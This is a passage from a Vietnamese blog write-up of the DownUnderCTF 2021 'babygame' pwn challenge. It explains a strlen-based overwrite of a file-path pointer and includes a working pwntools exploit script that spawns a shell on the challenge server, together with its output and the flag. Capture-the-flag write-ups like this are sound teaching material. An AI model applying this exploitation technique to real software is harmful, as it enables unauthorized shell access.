__readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  stream = <span class="built_in">fopen</span>(RANDBUF, <span class="string">&quot;rb&quot;</span>);</span><br><span class="line">  <span class="built_in">fread</span>(ptr, <span class="number">1uLL</span>, <span class="number">4uLL</span>, stream);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;guess: &quot;</span>);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">get_num</span>() == *(_DWORD *)ptr )</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> v3 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Tổng quan thì hàm này sẽ đọc 4 bytes từ file mở từ đường dẫn RANDBUF (Được gán “/dev/urandom” ở hàm main) và so với một con số được đọc từ bàn phím, nếu đoán đúng thì sẽ chạy system(“/bin/sh”) để lấy flag.</p>
<figure class="highlight cpp"><figcaption><span>set_username</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">size_t</span> <span class="title">set_username</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  FILE *v0; <span class="comment">// rbx</span></span><br><span class="line">  <span class="keyword">size_t</span> v1; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;What would you like to change your username to?&quot;</span>);</span><br><span class="line">  v0 = stdin;</span><br><span class="line">  v1 = <span class="built_in">strlen</span>(NAME);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">fread</span>(NAME, <span class="number">1uLL</span>, v1, v0);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Ở hàm này có một vấn đề là nó sẽ đọc một string có độ dài nhỏ hơn hoặc bằng string ban đầu với strlen thay vì read hẳn 32 bytes, cộng với vấn đề đã nói ở trên thì biến RANDBUF sẽ là mục tiêu bị đổi :)).</p>
<p>Ở hàm print_username() chỉ đơn giản là in biến NAME ra màn hình.</p>
<p>Vậy nếu thay đổi được RANDBUF thì sẽ thay đổi thành gì ? ở hàm game sẽ đọc file và lấy 4 bytes đầu &gt;&gt;&gt; để đoán được thì RANDBUF cần trỏ tới đường dẫn tới một file static (“/bin/sh”) do <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header">header của elf luôn giữ nguyên</a></p>
<p>Kiểm tra địa chỉ của string /bin/sh và /dev/urandom</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.rodata:<span class="number">0000000000002024</span> aDevUrandom     db <span class="string">&#x27;/dev/urandom&#x27;</span>,<span class="number">0</span>     ; DATA XREF: main+<span class="number">3</span>A↑o</span><br><span class="line">.rodata:<span class="number">00000000000020</span>A3 command         db <span class="string">&#x27;/bin/sh&#x27;</span>,<span class="number">0</span>          ; DATA XREF: game+<span class="number">7</span>D↑o</span><br></pre></td></tr></table></figure>

<p>Như vậy thì 2 biến này chỉ khác nhau ở byte đầu tiên (0x24 và 0xA3), nằm trong 0x100 nên bypass aslr được.</p>
<p>Vậy quá trình attack sẽ như sau:<br>Fill biến NAME với 32 ký tự bất kỳ &gt;&gt;&gt; Print name để leak địa chỉ của chuỗi “/dev/urandom” &gt;&gt;&gt; set name để sửa lại 1 byte &gt;&gt; gọi hàm game và điền số đã biết vào.</p>
<p>Header của file elf sẽ là <code>7F 45 4c 46</code>, đọc theo little endian sẽ là <code>46 4c 45 7f</code>, chuyển về số nguyên: 1179403647.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./babygame&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&quot;pwn-2021.duc.tf&quot;</span>, <span class="number">31907</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Fill NAME</span></span><br><span class="line">p.recvline()</span><br><span class="line">p.sendline(<span class="string">b&#x27;A&#x27;</span> * <span class="number">32</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;&gt; &#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;&gt; &#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Leak RANDBUF address</span></span><br><span class="line">p.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">leak = p.readline()[<span class="number">32</span>:-<span class="number">1</span>] <span class="comment"># Leave last character</span></span><br><span class="line">binsh = <span class="string">b&#x27;\xa3&#x27;</span> + leak[<span class="number">1</span>:]</span><br><span class="line"><span class="built_in">print</span>(binsh)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Rewrite RANDBUF address</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;&gt; &#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;A&#x27;</span> * <span class="number">32</span> + binsh)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Call game</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;&gt; &#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;1337&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Magic number</span></span><br><span class="line">p.sendline(<span class="string">b&#x27;1179403647&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">[+] Opening connection to pwn-2021.duc.tf on port 31907: Done</span><br><span class="line marked">b<span class="string">&#x27;\xa3 \xd6\xdb\xfbU&#x27;</span></span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">Invalid choice.</span><br><span class="line">1. Set Username</span><br><span class="line">2. Print Username</span><br><span class="line">&gt; guess: $ cat flag.txt</span><br><span class="line">DUCTF&#123;whats_in_a_name?_5aacfc58&#125;</span><br></pre></td></tr></table></figure>

<p><strong>flag: DUCTF{whats_in_a_name?_5aacfc58}</strong></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Overview"><span class="toc-number">1.</span> <span class="toc-text">Overview</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Write-ups"><span class="toc-number">2.</span> <span class="toc-text">Write ups</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-No-strings-Reversing"><span class="toc-number">2.1.</span> <span class="toc-text">1. No strings - Reversing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Flag-loader-Reversing"><span class="toc-number">2.2.</span> <span class="toc-text">2. Flag loader - Reversing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-Connect-the-dots-Reversing"><span class="toc-number">2.3.</span> <span class="toc-text">3. Connect the dots - Reversing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-OutBackdoor-Pwn"><span class="toc-number">2.4.</span> <span class="toc-text">4. OutBackdoor - Pwn</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-babygame-Pwn"><span class="toc-number">2.5.</span> <span class="toc-text">5. babygame - Pwn</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&text=DownUnderCTF 2021"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&is_video=false&description=DownUnderCTF 2021"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DownUnderCTF 2021&body=Check out this article: https://mekanican.github.io/2021/09/24/DownUnderCTF2021/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&name=DownUnderCTF 2021&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&t=DownUnderCTF 2021"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    Nghia Vo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
